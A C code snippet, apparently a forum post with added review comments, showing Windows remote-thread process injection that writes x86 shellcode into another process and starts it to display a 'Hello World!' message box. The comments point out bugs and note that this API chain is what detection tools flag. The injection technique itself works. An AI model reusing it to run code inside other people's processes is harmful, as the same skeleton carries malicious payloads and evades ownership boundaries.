[C] Process Injection (MessageBox Example)
Code:
/*
 * Parameter block that InjectRemoteCode copies into the target process and
 * passes to the remote thread as its single argument.
 *
 * The shellcode addresses this block by hard-coded offset, so member order
 * and sizes are part of the contract: on a 32-bit build (4-byte FARPROC)
 * szMessage sits at +0x20, fMessageBox at +0xA0 and fExitThread at +0xA4,
 * which are exactly the displacements used in the shellcode. Reordering or
 * resizing a member silently breaks it; on a 64-bit build the pointer
 * members would no longer be where the 32-bit shellcode expects them.
 *
 * NOTE(review): the tag name _INJECT (leading underscore + uppercase) is in
 * the namespace reserved for the implementation by the C standard.
 */
typedef struct _INJECT
{
    char szCaption[32];     /* NUL-terminated caption for the message box (offset 0) */
    char szMessage[128];    /* NUL-terminated body text (offset 0x20) */

    FARPROC fMessageBox;    /* MessageBoxA as resolved in the *injecting* process (offset 0xA0) */
    FARPROC fExitThread;    /* ExitThread as resolved in the *injecting* process (offset 0xA4) */

} INJECT, *PINJECT, *LPINJECT;

/*
 * Write an INJECT block plus a small x86 stub into the process identified by
 * ulProcessId and start a thread there that shows a MessageBox and then exits.
 *
 * Sequence (all visible below): OpenProcess -> HeapAlloc/fill INJECT locally
 * -> VirtualAllocEx (PAGE_READWRITE) + WriteProcessMemory for the block
 * -> VirtualAllocEx (PAGE_EXECUTE_READWRITE) + WriteProcessMemory for the
 * stub -> CreateRemoteThread(stub, block). From a detection standpoint this
 * exact API chain (RWX allocation in a foreign process followed by
 * CreateRemoteThread) is the canonical remote-thread injection pattern that
 * process-monitoring telemetry flags.
 *
 * Returns nothing and reports no error; every failure path just leaves.
 * Uses MSVC structured exception handling (__try/__finally), so this is not
 * portable C.
 *
 * NOTE(review): hThread is never initialised. Any __leave taken before
 * CreateRemoteThread (and the early return after a failed OpenProcess, which
 * still runs __finally) reaches CloseHandle(hThread) with an indeterminate
 * value. hProcess is likewise passed to CloseHandle even when OpenProcess
 * returned NULL.
 *
 * NOTE(review): the CreateRemoteThread result is not checked, and the two
 * remote allocations are never released with VirtualFreeEx (the remote
 * thread still needs them while it runs, so freeing here would be wrong,
 * but they are leaked in the target for its lifetime).
 *
 * NOTE(review): fMessageBox/fExitThread are resolved with GetModuleHandle in
 * this process. If USER32.DLL is not loaded here GetModuleHandle returns
 * NULL and the stub will call through a NULL pointer in the target; the
 * code also assumes the resolved addresses are valid at the same location
 * in the target process — TODO confirm for the intended environment.
 */
void InjectRemoteCode(unsigned long ulProcessId)
{
    /* By: og__ */

    /*
     * Thread entry stub (32-bit x86, stdcall). With ESI = lpParameter (the
     * remote copy of INJECT) it performs, per the per-instruction comments:
     *   MessageBoxA(NULL, &szMessage, &szCaption, 0)   via fMessageBox (+0xA0)
     *   ExitThread(0)                                 via fExitThread (+0xA4)
     * The final POP ESI is never reached because ExitThread does not return.
     * Declared as a char array from a string literal, so sizeof includes the
     * implicit terminating NUL — hence the "- 1" on every use below.
     */
    char szShellcode[] = {
        "\x56"                        // PUSH ESI
        "\x8B\x74\x24\x08"            // MOV ESI,DWORD PTR SS:[ESP+8]
        "\x6A\x00"                    // PUSH 0
        "\x8D\x46\x20"                // LEA EAX,DWORD PTR DS:[ESI+20]
        "\x56"                        // PUSH ESI
        "\x50"                        // PUSH EAX
        "\x6A\x00"                    // PUSH 0
        "\xFF\x96\xA0\x00\x00\x00"    // CALL DWORD PTR DS:[ESI+A0]
        "\x6A\x00"                    // PUSH 0
        "\xFF\x96\xA4\x00\x00\x00"    // CALL DWORD PTR DS:[ESI+A4]
        "\x5E"                        // POP ESI
    };

    INJECT *lpInject = NULL;
    HANDLE hProcess, hThread;   /* NOTE(review): both uninitialised; see header comment */
    void *lpRemoteInfo = NULL, *lpRemoteCode = NULL;

    __try
    {
        /* Rights needed for VirtualAllocEx/WriteProcessMemory/CreateRemoteThread. */
        if ((hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, FALSE, ulProcessId)) == NULL)
            return;     /* __finally still runs here */

        /* HEAP_ZERO_MEMORY guarantees the strings are NUL-padded before the copy. */
        if ((lpInject = (INJECT *)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(INJECT))) == NULL)
            __leave;

        /* Both literals fit their 32/128-byte buffers; strcpy is safe only because of that. */
        strcpy(lpInject->szCaption, "Message Box");
        strcpy(lpInject->szMessage, "Hello World!");

        /* Resolved in the current process; see header NOTE about validity in the target. */
        lpInject->fMessageBox = GetProcAddress(GetModuleHandle("USER32.DLL"), "MessageBoxA");
        lpInject->fExitThread = GetProcAddress(GetModuleHandle("KERNEL32.DLL"), "ExitThread");

        /* Data page: read/write only. */
        if ((lpRemoteInfo = VirtualAllocEx(hProcess, NULL, sizeof(INJECT), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE)) == NULL)
            __leave;

        if (WriteProcessMemory(hProcess, lpRemoteInfo, lpInject, sizeof(INJECT),  0) == 0)
            __leave;

        /* Code page: RWX; the "- 1" drops the string literal's trailing NUL. */
        if ((lpRemoteCode = VirtualAllocEx(hProcess, NULL, sizeof(szShellcode) - 1, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE)) == NULL)
            __leave;

        if (WriteProcessMemory(hProcess, lpRemoteCode, szShellcode, sizeof(szShellcode) - 1,  0) == 0)
            __leave;

        /* Stub receives lpRemoteInfo as its lpParameter. Return value unchecked. */
        hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpRemoteCode, lpRemoteInfo, 0, NULL);
    }

    __finally
    {
        /* Runs on every exit from __try, including the early return above. */
        if (hThread != 0)
            CloseHandle(hThread);

        if (lpInject != NULL)
            HeapFree(GetProcessHeap(), 0, lpInject);

        /* NOTE(review): reached with hProcess == NULL when OpenProcess failed. */
        CloseHandle(hProcess);
    }
    return;
}